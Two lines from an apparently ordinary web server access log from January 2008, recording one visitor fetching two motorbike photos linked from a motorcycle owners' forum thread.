72.199.235.196 - - [26/Jan/2008:16:40:00 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=34707" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.199.235.196 - - [26/Jan/2008:16:40:00 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=34707" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
